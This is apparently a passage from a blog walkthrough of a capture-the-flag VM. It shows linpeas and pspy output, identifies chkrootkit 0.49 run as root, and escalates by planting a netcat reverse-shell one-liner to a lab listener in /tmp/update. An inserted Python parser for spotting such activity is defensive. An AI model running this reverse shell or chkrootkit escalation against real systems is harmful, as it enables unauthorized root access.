-rw-r--r--  1 root root  664 Mar  1  2019 bash_completion.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/296640a3b825115a47b68fc44501c828/honeypot.decoy
/home/296640a3b825115a47b68fc44501c828/honeypot.decoy.cpp
/home/296640a3b825115a47b68fc44501c828/SV-502/logs
/home/296640a3b825115a47b68fc44501c828/SV-502/logs/log.txt
/home/296640a3b825115a47b68fc44501c828/ifconfig
/home/296640a3b825115a47b68fc44501c828/mkdir
/home/296640a3b825115a47b68fc44501c828/id
/home/296640a3b825115a47b68fc44501c828/.profile
/home/296640a3b825115a47b68fc44501c828/ls
/home/296640a3b825115a47b68fc44501c828/.bash_history
/root/
/var/www
/var/www/html
/var/www/html/save.zip

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/home/296640a3b825115a47b68fc44501c828
/home/296640a3b825115a47b68fc44501c828/SV-502
/sys/fs/cgroup/systemd/user.slice/user-1000.slice/user@1000.service
/sys/fs/cgroup/unified/user.slice/user-1000.slice/user@1000.service

╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/daemon.log
/var/log/lastlog
/var/log/wtmp
/var/log/auth.log
/var/log/syslog

╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes

╔══════════╣ Files inside /home/296640a3b825115a47b68fc44501c828 (limit 20)
total 64
drwxr-xr-x 4 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  4096 Jul  7  2020 .
drwxr-xr-x 3 root                             root                              4096 Jun 27  2020 ..
lrwxrwxrwx 1 root                             root                                 9 Jul  7  2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828   220 Jun 27  2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  3583 Jun 27  2020 .bashrc
-rwxr-xr-x 1 root                             root                             17480 Jul  7  2020 honeypot.decoy
-rw------- 1 root                             root                              1855 Jul  7  2020 honeypot.decoy.cpp
lrwxrwxrwx 1 root                             root                                 7 Jun 27  2020 id -> /bin/id
lrwxrwxrwx 1 root                             root                                13 Jun 27  2020 ifconfig -> /bin/ifconfig
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  4096 Jun 27  2020 .local
lrwxrwxrwx 1 root                             root                                 7 Jun 27  2020 ls -> /bin/ls
lrwxrwxrwx 1 root                             root                                10 Jun 27  2020 mkdir -> /bin/mkdir
-rwxr-xr-x 1 root                             root                               807 Jun 27  2020 .profile
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    66 Jun 27  2020 .selected_editor
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  4096 Jun 27  2020 SV-502
-rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    33 Jul  7  2020 user.txt
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828   173 Jun 27  2020 .wget-hsts

╔══════════╣ Files inside others home (limit 20)
/var/www/html/save.zip

╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 363752 Apr 30  2018 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 303 Oct 26  2018 /usr/share/doc/hdparm/changelog.old.gz
-rw-r--r-- 1 root root 194817 Nov 23  2016 /usr/share/doc/x11-common/changelog.Debian.old.gz
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 9716 Apr 27  2020 /usr/lib/modules/4.19.0-8-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9716 Jun  7  2020 /usr/lib/modules/4.19.0-9-amd64/kernel/drivers/net/team/team_mode_activebackup.ko


╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x  3 root root 4.0K Jun 27  2020 .
drwxr-xr-x 12 root root 4.0K Jun 27  2020 ..
drwxr-xr-x  2 root root 4.0K Jul  7  2020 html

/var/www/html:
total 12K
drwxr-xr-x 2 root root 4.0K Jul  7  2020 .
drwxr-xr-x 3 root root 4.0K Jun 27  2020 ..

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 0 Nov 15  2018 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 66 Jun 27  2020 /home/296640a3b825115a47b68fc44501c828/.selected_editor
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 173 Jun 27  2020 /home/296640a3b825115a47b68fc44501c828/.wget-hsts
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27  2020 /home/296640a3b825115a47b68fc44501c828/.bash_logout
-rw------- 1 root root 0 Jun 27  2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 18  2019 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 0 Nov  7 03:52 /run/network/.ifstate.lock

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxr-xr-x 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 827827 Nov  7 04:36 /tmp/linpeas.sh
-rw-r--r-- 1 root root 152413 Jun 27  2020 /var/backups/dpkg.status.1.gz
-rw-r--r-- 1 root root 24405 Jun 27  2020 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 230 Jun 27  2020 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 578191 Jul  7  2020 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 186 Jun 27  2020 /var/backups/dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 126 Jun 27  2020 /var/backups/dpkg.diversions.2.gz
-rw-r--r-- 1 root root 40960 Jun 27  2020 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 147845 Jun 27  2020 /var/backups/dpkg.status.2.gz
-rw-r--r-- 1 root root 186 Jun 27  2020 /var/backups/dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 186 Jun 27  2020 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 126 Jun 27  2020 /var/backups/dpkg.diversions.1.gz

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/296640a3b825115a47b68fc44501c828
/run/lock
/run/user/1000
/run/user/1000/systemd
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/.X11-unix
#)You_can_write_even_more_files_inside_last_directory

/var/lib/php/sessions
/var/tmp

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/systemd-reply-password
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
/usr/lib/systemd/system/systemd-ask-password-wall.service
  #)There are more creds/passwds files in the previous parent folder

/usr/share/hplip/base/password.py
/usr/share/hplip/base/__pycache__/password.cpython-37.pyc
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
2020-06-27 20:57:50 configure base-passwd:amd64 3.5.46 3.5.46
2020-06-27 20:57:50 install base-passwd:amd64 <none> 3.5.46
2020-06-27 20:57:50 status half-configured base-passwd:amd64 3.5.46
2020-06-27 20:57:50 status half-installed base-passwd:amd64 3.5.46
2020-06-27 20:57:50 status installed base-passwd:amd64 3.5.46
2020-06-27 20:57:50 status unpacked base-passwd:amd64 3.5.46
2020-06-27 20:58:08 status half-configured base-passwd:amd64 3.5.46
2020-06-27 20:58:08 status half-installed base-passwd:amd64 3.5.46
2020-06-27 20:58:08 status unpacked base-passwd:amd64 3.5.46
2020-06-27 20:58:08 upgrade base-passwd:amd64 3.5.46 3.5.46
2020-06-27 20:58:16 install passwd:amd64 <none> 1:4.5-1.1
2020-06-27 20:58:16 status half-installed passwd:amd64 1:4.5-1.1
2020-06-27 20:58:17 status unpacked passwd:amd64 1:4.5-1.1
2020-06-27 20:58:26 configure base-passwd:amd64 3.5.46 <none>
2020-06-27 20:58:26 status half-configured base-passwd:amd64 3.5.46
2020-06-27 20:58:26 status installed base-passwd:amd64 3.5.46
2020-06-27 20:58:26 status unpacked base-passwd:amd64 3.5.46
2020-06-27 20:58:27 configure passwd:amd64 1:4.5-1.1 <none>
2020-06-27 20:58:27 status half-configured passwd:amd64 1:4.5-1.1
2020-06-27 20:58:27 status installed passwd:amd64 1:4.5-1.1
2020-06-27 20:58:27 status unpacked passwd:amd64 1:4.5-1.1
Description: Set up users and passwords

                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════                                                                                                                                                          
                                ╚════════════════╝                                                                                                                                                                                          
Regexes to search for API keys aren't activated, use param '-r'
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cd SV-502/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ ls -alh
total 12K
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27  2020 .
drwxr-xr-x 4 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul  7  2020 ..
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    0 Jun 27  2020 fich
drwxrwxrwx 2 root                             root                             4.0K Jun 27  2020 logs
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ cd logs
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ ls -alh
total 16K
drwxrwxrwx 2 root                             root                             4.0K Jun 27  2020 .
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27  2020 ..
-rw-r--r-- 1 root                             root                             7.7K Jun 27  2020 log.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ cat log.txt
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/27 18:56:57 CMD: UID=0    PID=9      | 
2020/06/27 18:56:57 CMD: UID=0    PID=8      | 
2020/06/27 18:56:57 CMD: UID=1000 PID=7659   | /bin/bash 
2020/06/27 18:56:57 CMD: UID=1000 PID=7658   | python -c import pty;pty.spawn('/bin/bash') 
2020/06/27 18:56:57 CMD: UID=1000 PID=7657   | /bin/sh -i 
2020/06/27 18:56:57 CMD: UID=1000 PID=7653   | sh -c uname -a; w; id; /bin/sh -i 
2020/06/27 18:56:57 CMD: UID=1000 PID=7652   | php -S 0.0.0.0:8080 
2020/06/27 18:56:57 CMD: UID=1000 PID=7645   | php -S 0.0.0.0:8080 
2020/06/27 18:56:57 CMD: UID=0    PID=6      | 
2020/06/27 18:56:57 CMD: UID=0    PID=59     | 
2020/06/27 18:56:57 CMD: UID=0    PID=50     | 
2020/06/27 18:56:57 CMD: UID=0    PID=49     | 
2020/06/27 18:56:57 CMD: UID=0    PID=481    | -bash 
2020/06/27 18:56:57 CMD: UID=0    PID=48     | 
2020/06/27 18:56:57 CMD: UID=0    PID=471    | (sd-pam) 
2020/06/27 18:56:57 CMD: UID=0    PID=470    | /lib/systemd/systemd --user 
2020/06/27 18:56:57 CMD: UID=0    PID=467    | sshd: root@pts/0     
2020/06/27 18:56:57 CMD: UID=0    PID=424    | /usr/sbin/sshd -D 
2020/06/27 18:56:57 CMD: UID=0    PID=423    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2020/06/27 18:56:57 CMD: UID=0    PID=422    | /usr/sbin/cups-browsed 
2020/06/27 18:56:57 CMD: UID=107  PID=420    | avahi-daemon: chroot helper 
2020/06/27 18:56:57 CMD: UID=0    PID=402    | /usr/sbin/cupsd -l 
2020/06/27 18:56:57 CMD: UID=0    PID=401    | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant 
2020/06/27 18:56:57 CMD: UID=104  PID=400    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2020/06/27 18:56:57 CMD: UID=0    PID=4      | 
2020/06/27 18:56:57 CMD: UID=0    PID=399    | /usr/sbin/cron -f 
2020/06/27 18:56:57 CMD: UID=0    PID=398    | /lib/systemd/systemd-logind 
2020/06/27 18:56:57 CMD: UID=107  PID=396    | avahi-daemon: running [60832e9f188106ec5bcc4eb7709ce592.local] 
2020/06/27 18:56:57 CMD: UID=0    PID=395    | /usr/sbin/rsyslogd -n -iNONE 
2020/06/27 18:56:57 CMD: UID=0    PID=390    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3 
2020/06/27 18:56:57 CMD: UID=0    PID=30     | 
2020/06/27 18:56:57 CMD: UID=0    PID=3      | 
2020/06/27 18:56:57 CMD: UID=0    PID=294    | 
2020/06/27 18:56:57 CMD: UID=0    PID=292    | 
2020/06/27 18:56:57 CMD: UID=0    PID=29     | 
2020/06/27 18:56:57 CMD: UID=0    PID=28     | 
2020/06/27 18:56:57 CMD: UID=0    PID=27     | 
2020/06/27 18:56:57 CMD: UID=0    PID=26     | 
2020/06/27 18:56:57 CMD: UID=101  PID=255    | /lib/systemd/systemd-timesyncd 
2020/06/27 18:56:57 CMD: UID=0    PID=25     | 
2020/06/27 18:56:57 CMD: UID=0    PID=245    | /lib/systemd/systemd-udevd 
2020/06/27 18:56:57 CMD: UID=0    PID=24     | 
2020/06/27 18:56:57 CMD: UID=0    PID=23     | 
2020/06/27 18:56:57 CMD: UID=0    PID=222    | /lib/systemd/systemd-journald 
2020/06/27 18:56:57 CMD: UID=0    PID=22     | 
2020/06/27 18:56:57 CMD: UID=0    PID=21     | 
2020/06/27 18:56:57 CMD: UID=0    PID=20     | 
2020/06/27 18:56:57 CMD: UID=0    PID=2      | 
2020/06/27 18:56:57 CMD: UID=0    PID=190    | 
2020/06/27 18:56:57 CMD: UID=0    PID=19     | 
2020/06/27 18:56:57 CMD: UID=0    PID=189    | 
2020/06/27 18:56:57 CMD: UID=0    PID=187    | 
2020/06/27 18:56:57 CMD: UID=0    PID=18     | 
2020/06/27 18:56:57 CMD: UID=0    PID=17     | 
2020/06/27 18:56:57 CMD: UID=0    PID=16     | 
2020/06/27 18:56:57 CMD: UID=0    PID=153    | 
2020/06/27 18:56:57 CMD: UID=0    PID=15     | 
2020/06/27 18:56:57 CMD: UID=0    PID=14     | 
2020/06/27 18:56:57 CMD: UID=0    PID=12378  | ./pspy 
2020/06/27 18:56:57 CMD: UID=0    PID=12356  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12299  | -bash 
2020/06/27 18:56:57 CMD: UID=0    PID=12293  | sshd: root@pts/2     
2020/06/27 18:56:57 CMD: UID=0    PID=12275  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12248  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12247  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12178  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12121  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12     | 
2020/06/27 18:56:57 CMD: UID=0    PID=112    | 
2020/06/27 18:56:57 CMD: UID=0    PID=110    | 
2020/06/27 18:56:57 CMD: UID=0    PID=11     | 
2020/06/27 18:56:57 CMD: UID=0    PID=108    | 
2020/06/27 18:56:57 CMD: UID=0    PID=107    | 
2020/06/27 18:56:57 CMD: UID=0    PID=105    | 
2020/06/27 18:56:57 CMD: UID=0    PID=104    | 
2020/06/27 18:56:57 CMD: UID=0    PID=102    | 
2020/06/27 18:56:57 CMD: UID=0    PID=10     | 
2020/06/27 18:56:57 CMD: UID=0    PID=1      | /sbin/init 
2020/06/27 18:56:58 CMD: UID=0    PID=12385  | -bash 
2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz 
2020/06/27 18:57:04 CMD: UID=0    PID=12389  | -bash 
2020/06/27 18:57:04 CMD: UID=0    PID=12390  | -bash 
2020/06/27 18:57:04 CMD: UID=0    PID=12391  | -bash 
2020/06/27 18:57:05 CMD: UID=0    PID=12392  | -bash 
2020/06/27 18:57:05 CMD: UID=0    PID=12393  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12394  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12395  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12396  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12397  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12398  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12399  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12400  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12401  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12402  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12403  | -bash 
Exiting program... (interrupt)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ 

The log shows root unpacking chkrootkit-0.49.
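As an added example (not part of the original walkthrough), here is a small parser for pspy `CMD` lines that flags the two things worth noticing in the log above: a root process handling a chkrootkit release in the affected version range, and interactive shells spawned by the non-root user that runs `php -S`. The sample lines are copied from the log above; the alert names and the 0.49 version threshold are my own choices.

```python
import re
from dataclasses import dataclass

# One pspy "CMD" line, e.g.
#   2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz
PSPY_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: "
    r"UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s*(?P<cmd>.*?)\s*$"
)
# Versions up to 0.49 are the range the exploit-db entry cited on this page covers (assumed threshold)
CHKROOTKIT_RE = re.compile(r"chkrootkit-(\d+)\.(\d+)")
VULN_MAX_VERSION = (0, 49)
# Interactive-shell chains that a web service user (php -S here) should never spawn
SHELL_RE = re.compile(r"pty\.spawn|/bin/sh -i")

@dataclass
class PspyEvent:
    ts: str
    uid: int
    pid: int
    cmd: str

def parse_pspy(text):
    """Parse pspy output; banner, config and 'Exiting' lines do not match and are skipped."""
    events = []
    for line in text.splitlines():
        m = PSPY_RE.match(line)
        if m:
            events.append(PspyEvent(m["ts"], int(m["uid"]), int(m["pid"]), m["cmd"]))
    return events

def find_alerts(events):
    alerts = []
    for e in events:
        m = CHKROOTKIT_RE.search(e.cmd)
        if e.uid == 0 and m:
            ver = (int(m.group(1)), int(m.group(2)))
            kind = "root-runs-vulnerable-chkrootkit" if ver <= VULN_MAX_VERSION else "root-runs-chkrootkit"
            alerts.append((kind, e))
        elif e.uid != 0 and SHELL_RE.search(e.cmd):
            alerts.append(("non-root-interactive-shell", e))
    return alerts

# Constructed sample: CMD lines copied from the log above, plus one non-CMD line
SAMPLE_LOG = """2020/06/27 18:56:57 CMD: UID=1000 PID=7658   | python -c import pty;pty.spawn('/bin/bash')
2020/06/27 18:56:57 CMD: UID=1000 PID=7653   | sh -c uname -a; w; id; /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7652   | php -S 0.0.0.0:8080
2020/06/27 18:56:57 CMD: UID=0    PID=6      |
2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz
Exiting program... (interrupt)"""
```

Running `find_alerts(parse_pspy(SAMPLE_LOG))` yields two shell alerts for UID 1000 and one vulnerable-chkrootkit alert for PID 12386.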

Check whether this version of chkrootkit has a known vulnerability:

https://www.exploit-db.com/exploits/33899

This exploit entry gives the privilege escalation steps:

- Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously)
- Run chkrootkit (as uid 0)

In other words, create an executable script named update:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.137 5555 >/tmp/f' >/tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ chmod 777 /tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ /usr/bin/cat /tmp/update
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.137 5555 >/tmp/f
$ ls 

Then trigger the scan:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ 

A root shell was obtained on the listener.


posted @ 2022-11-07 18:33  Jason_huawen